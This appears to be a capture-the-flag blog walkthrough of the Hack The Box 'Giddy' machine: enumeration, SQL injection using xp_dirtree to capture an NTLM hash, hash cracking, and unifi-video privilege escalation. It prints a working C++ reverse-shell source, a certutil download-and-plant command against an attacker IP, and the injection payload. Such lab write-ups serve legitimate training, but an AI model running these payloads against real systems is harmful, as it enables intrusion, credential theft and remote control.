Giddy – HACK THE BOX

Hello Hackers!!!

In this blog post, we gonna solve the CTF Challenge GIDDY presented by Hack the box. GIDDY is a very interesting and tricky Challenge and its ratings seem good and also the level of difficulty is 7/8 out of 10.

Index

  • About Box
  • Enumeration
    • Port Scanning
    • Enumeration on port 80 (HTTP Service)
      • Directory Brute Forcin
  • SQl Injection
    • Xp_dirtree Command Execution
  • SMB Server hash
  • Cracking Hash With John
  • Getting User
  • Post Enumeration
  • Privilege Escalation
    • unifi-video Local Privilege Escalation

About Box

Level: Intermediate
OS: Windows
IP Address: 10.10.10.104

Lets get Start!!!

Enumeration

Let’s start with post scanning

Nmap Port Scanning

Command

nmap 10.10.10.104

Nmap Aggressive and Service Version scan (to get more detailed information).

Command

nmap 10.10.10.104 -sV -A

Lets see what’s on Port 80.

Directory Brute-forcing on Port 80 using gobuster.

Command

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.104 -t 20 -x php,asp,aspx,txt

Two new Directories.

/remote
/mvc

Lets see /remote.

URL: https://10.10.10.104/Remote/en-US/logon.aspx?ReturnUrl=%2fremote%2f

Cool, Power-Shell Login. But We need credentials to login, Let’s try on 2nd directory

URL: http://10.10.10.104/mvc/
URL: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18

We have ID parameter in URL. So, I tried SQL injection and Got error.

URL: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18%27

Getting User…

Superb!!! We have SQL Injection here. But Unfortunately SQLMap don’t have desired results like usernames or passwords.

After Some research I found that we can execute Commands in MS-SQL using xp_dirtree.

What I am going to do here is I will start a SMB server on my kali using Metasploit and by using xp_dirtree I”ll send a command from Giddy to connect to my SMB Server. Here Giddy’s current user will try to connect to my SMB Server with his username and password.

Msfconsole

msf > use auxiliary/server/capture/smb
msf auxiliary(server/capture/smb) > show options
msf auxiliary(server/capture/smb) > set JOHNPWFILE /root/extra/Giddy/hash
msf auxiliary(server/capture/smb) > run

Requesting SMB Server using xp_dirtree

URL: https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=0;%20exec%20master..xp_dirtree%20%27\10.10.14.4\asd.txt%27,1,
Successful Request invoke

Username: Stacy
Domain: GIDDY
NTHASH: c0abbe54b3881103a74614362605aa7

Stored full request in /root/extra/Giddy/hash 

Let’s use john to crack the hash 😉

Command

john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash_netntlmv2

Nice Job!!! Password Recovered Successfully.

Password: xNnWo6272k7x

Now we have the User, Password, Domain
Let’s try to login on Remote PowerShell.

URL: https://10.10.10.104/Remote/en-US/logon.aspx

Awesome, we have a PowerShell Remote commend execution.

and here is our user.txt on user Stacy’s desktop

Post Enumeration

in Documents I found a program. unifivideo

After some searching i found that unifivideo is vulnerable to Local Privilege escalation.

after a bit fuzz i found that the service is installed in the following directory and is vulnerable.

Command

PS C:\Users\All Users> icacls .\unifi-video

Cool!! Service is Vulnerable. all we have to do is to place a executable names taskkill.exe contains our evil shell and then all we have to do is to start/restart the service.
I tried various msf shell but didn’t able to get them on the Giddy because Giddy is using some kind of protection, something like antivirus.

Privilege Escalation

Then I decide to make my own shell in c++

include 
include
include
include
include
pragma comment(lib, "Ws2_32.lib")
define REMOTE_ADDR "10.10.14.4"
define REMOTE_PORT "4444"

int main(int argc, char *argv[])
{
FreeConsole();
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
struct addrinfo *result = NULL, *ptr = NULL, hints;
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result);
ptr = result;
SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL);
connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = (HANDLE)ConnectSocket;
si.hStdOutput = (HANDLE)ConnectSocket;
si.hStdError = (HANDLE)ConnectSocket;
TCHAR cmd[] = TEXT("C:\WINDOWS\SYSTEM32\CMD.EXE");
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
WSACleanup();
}

and then compiled it on my Windows using visual studio on x64 Operating System as Giddy is also x64 OS

Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\10>cd "c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build"
c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build>vcvars32.bat amd64

** Visual Studio 2017 Developer Command Prompt v15.7.6
** Copyright (c) 2017 Microsoft Corporation

[vcvarsall.bat] Environment initialized for: 'x64'
c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build>
c:\Users\10\Documents>cl shell.cpp
Microsoft (R) C/C++ Optimizing Compiler Version 19.14.26433 for x64
Copyright (C) Microsoft Corporation. All rights reserved.
shell.cpp
Microsoft (R) Incremental Linker Version 14.14.26433.0
Copyright (C) Microsoft Corporation. All rights reserved.
/out:shell.exe
shell.obj
c:\Users\10\Documents>

place it on my Kali Linux and then tried to upload the executable using Certutils.

Command

PS C:\Users\All Users\unifi-video> 
cmd.exe /k certutil -urlcache -split -f http://10.10.14.4/shell.exe 'C:\Users\All Users\unifi-video\taskkill.exe'
CertUtil: -URLCache command completed successfully.

after a bit search I found that I need to use java and I can stop airvision.jar which may invoke the taskkill.exe

So, I started a listener using nc.

Command

nc -nlvp 4444

and stopped he service using java.

Command

java -jar .\lib\airvision.jar stop

Great!! Successfully got the shell.

and here is our root.txt on Administrator’s Desktop

Congrats!!

Thank you for reading. If you have any issue. just drop a comment below 😉

Leave a Reply

Your email address will not be published. Required fields are marked *